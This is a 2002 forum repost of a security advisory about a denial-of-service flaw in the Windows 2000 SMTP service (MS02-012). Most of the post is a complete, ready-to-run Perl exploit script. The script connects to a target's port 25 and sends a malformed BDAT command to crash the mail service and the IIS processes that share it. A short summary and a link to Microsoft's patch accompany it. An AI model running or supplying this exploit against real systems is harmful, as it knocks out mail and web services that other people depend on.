免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3424 | 回复: 0
打印 上一主题 下一主题

Windows_SMTP_Service_Malformed_Data_Transfer_Request_bug [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2002-06-18 21:49 |只看该作者 |倒序浏览
From:http://www.securiteam.com/windowsntfocus/5XP0L2A6AS.html \r\n\r\nSummary : \r\nAn SMTP service installs by default as part of Windows 2000 server products.  \r\nExchange 2000, which can only be installed on Windows 2000, uses the native  \r\nWindows 2000 SMTP service rather than providing its own. In addition, Windows  \r\n2000 and Windows XP workstation products provide an SMTP service that is not  \r\ninstalled by default. All of these implementations contain a flaw that could  \r\nenable denial of service attacks to be mounted against the service.  \r\n\r\nThe flaw involves how the service handles a particular type of SMTP command  \r\nused to transfer the data that constitutes an incoming mail. By sending a  \r\nmalformed version of this command, an attacker could cause the SMTP service to  \r\nfail. This would have the effect of disrupting mail services on the affected  \r\nsystem, but would not cause the operating system itself to fail. \r\n\r\n\r\nexploit: \r\n#----Begin---- \r\n#!/usr/bin/perl -w \r\n################## \r\n# \r\n# \r\n# URL: http://www.digitaloffense.net/ \r\n# EMAIL: hdm@digitaloffense.net \r\n# USAGE: ./mssmtp_dos.pl <target ip> \r\n# \r\n# Summary: \r\n# \r\n# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a \r\n# Denial of Service attack through the BDAT command. If exploited, this \r\n# vulnerability will cause any and all services running under IIS (the \r\n# inetinfo.exe process) to become unavailable. \r\n# \r\n# \r\n# Solution:  \r\n#  \r\n# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp \r\n# \r\n\r\nuse IO::Socket; \r\n     \r\n$target = shift() || \"127.0.0.1\"; \r\nmy $port = 25; \r\nmy $rcpt = \"Administrator\"; \r\nmy $from = \"crash\\@burn.com\"; \r\n\r\nmy $sock = IO::Socket::INET->new ( \r\n                                    PeerAddr => $target, \r\n                                    PeerPort => $port, \r\n                                    Proto => \'tcp\' \r\n                                 ) || die \"could not connect: $!\"; \r\n\r\nmy $banner = <$sock>; \r\nif ($banner !~ /^2.*/) \r\n{ \r\n    print STDERR \"Error: invalid server response \'$banner\'.\\n\"; \r\n    exit(1); \r\n} \r\n\r\nprint $sock \"HELO $target\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"MAIL FROM: $from\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"RCPT TO: $rcpt\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"BDAT 4\\r\\n\"; \r\nprint $sock \"b00mAUTH LOGIN\\r\\n\"; \r\n$resp = <$sock>; \r\n\r\nprint $sock \"\\r\\n\"; \r\nprint $sock \"\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\"; \r\n\r\nclose($sock); \r\n#----End---- \r\n  \r\n Additional information  \r\nThe information has been provided by H D MooreA.  \r\n\r\n  \r\n
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP